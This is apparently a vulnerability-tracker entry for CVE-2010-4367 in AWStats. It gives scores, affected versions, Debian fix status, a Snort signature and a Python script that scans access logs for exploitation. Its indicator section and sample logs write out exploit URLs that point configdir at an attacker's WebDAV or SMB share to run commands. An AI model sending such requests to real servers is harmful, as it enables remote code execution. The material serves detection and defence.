CVE-2010-4367
Published 2010-12-02
Priority: P268 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 27.67% (97.8th percentile)
awstats.cgi in AWStats before 7.0 accepts a configdir parameter in the URL, which allows remote attackers to execute arbitrary commands via a crafted configuration file located on a (1) WebDAV server or (2) NFS server.
Affected
38 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| awstats | awstats | <= 6.95 | — |
Detection & IOCs
url: http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress:80\webdav
url: http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress\SMB-Share
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Attempt"; flow:established,to_server; http.uri; content:"awstats.cgi"; nocase; content:"config="; nocase; content:"pluginmode=rawlog"; nocase; content:"configdir=|5C 5C|"; nocase; fast_pattern; reference:bid,45123; reference:cve,2010-4367; classtype:web-application-attack; sid:2012393; rev:4; metadata:created_at 2011_03_01, cve CVE_2010_4367, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_13;)
bytes
|5C 5C|
- Look for HTTP requests to awstats.cgi containing both 'pluginmode=rawlog' and 'configdir=\\' (UNC path prefix, bytes 5C 5C) in the URI; this is the canonical exploit pattern for CVE-2010-4367 targeting WebDAV/SMB shares.
- The attack requires three URL parameters to be present simultaneously: config=<arbitrary>, pluginmode=rawlog, and configdir=\\<attacker-controlled-host>\<share>. Alerting on any URI containing all three is high-fidelity.
- Two distinct transport variants exist: WebDAV over port 80 (configdir=\\host:80\webdav) targeting Windows XP + Apache Tomcat, and SMB (configdir=\\host\share) targeting Windows 2003/XP. Monitor for both UNC path styles in web server logs.
- Exploitation is primarily Windows-specific (WebDAV/SMB UNC paths). On Linux, the attack is not straightforwardly reproducible without non-default automount configuration, making the impact significantly lower on Linux deployments.
- The Emerging Threats Snort rule (sid:2012393) specifically targets the UNC-path variant of the exploit; Linux-based configdir path traversal attacks (local filesystem) would not be caught by this signature alone.
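The three-parameter check from the notes above, applied to web server access logs, where the UNC prefix may appear percent-encoded (%5C%5C) rather than as raw backslashes. This is an added example, not part of the original record or of any vendor rule; the log lines are constructed, the function names are hypothetical, and the lower-confidence `configdir-present` tier is an assumption that extends the match to non-UNC values the signature would miss.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access-log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return 'unc-configdir', 'configdir-present' or None for one log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("awstats.cgi"):
        return None
    # parse_qs percent-decodes values, so %5C%5C is compared as a literal \\ here.
    params = {k.lower(): v
              for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    configdirs = params.get("configdir", [])
    if not configdirs:
        return None
    # Servers that escape backslashes when logging write \\\\, which still matches.
    unc = any(v.startswith("\\\\") for v in configdirs)
    rawlog = any(v.lower() == "rawlog" for v in params.get("pluginmode", []))
    if unc and rawlog and "config" in params:
        return "unc-configdir"      # all three parameters: high fidelity
    return "configdir-present"      # assumption: review any configdir in a URL

# Constructed sample lines; addresses and hosts are placeholders.
SAMPLE_LOG = [
    r'203.0.113.5 - - [02/Dec/2010:10:00:00 +0000] "GET /cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress\SMB-Share HTTP/1.1" 200 512',
    r'203.0.113.5 - - [02/Dec/2010:10:00:05 +0000] "GET /cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=%5C%5CAttacker-IPAddress%3A80%5Cwebdav HTTP/1.1" 200 512',
    r'198.51.100.7 - - [02/Dec/2010:10:01:00 +0000] "GET /cgi-bin/awstats.cgi?config=site&configdir=/srv/other HTTP/1.1" 200 90',
    r'198.51.100.9 - - [02/Dec/2010:10:02:00 +0000] "GET /cgi-bin/awstats.cgi?config=www.example.com&output=main HTTP/1.1" 200 4096',
]

def scan(lines):
    """Classify every line; the result list is index-aligned with the input."""
    return [classify(line) for line in lines]

if __name__ == "__main__":
    for verdict, line in zip(scan(SAMPLE_LOG), SAMPLE_LOG):
        if verdict:
            print(verdict, line)
```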
CVSS provenance
nvd · v2.0 · 7.5 · HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
osv · 7.5 · HIGH
vendor_debian · 7.5 · LOW
GHSA
GHSA-p75r-4c9j-53m6: awstats
ghsa_unreviewed·2022-05-17
CVE-2010-4367 [HIGH] CWE-94 GHSA-p75r-4c9j-53m6: awstats
OSV
CVE-2010-4367: awstats
osv·2010-12-02·CVSS 7.5
Debian
CVE-2010-4367: awstats - awstats.cgi in AWStats before 7.0 accepts a configdir parameter in the URL, whic...
vendor_debian·2010·CVSS 7.5
Scope: local
bookworm: resolved (fixed in 6.9.5~dfsg-5)
bullseye: resolved (fixed in 6.9.5~dfsg-5)
forky: resolved (fixed in 6.9.5~dfsg-5)
sid: resolved (fixed in 6.9.5~dfsg-5)
trixie: resolved (fixed in 6.9.5~dfsg-5)
Suricata
ET WEB_SPECIFIC_APPS Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Attempt
suricata·2011-03-01
http://awstats.sourceforge.net/docs/awstats_changelog.txt
http://www.exploitdevelopment.com/Vulnerabilities/2010-WEB-001.html
http://www.mandriva.com/security/advisories?name=MDVSA-2011:033
Published: 2010-12-02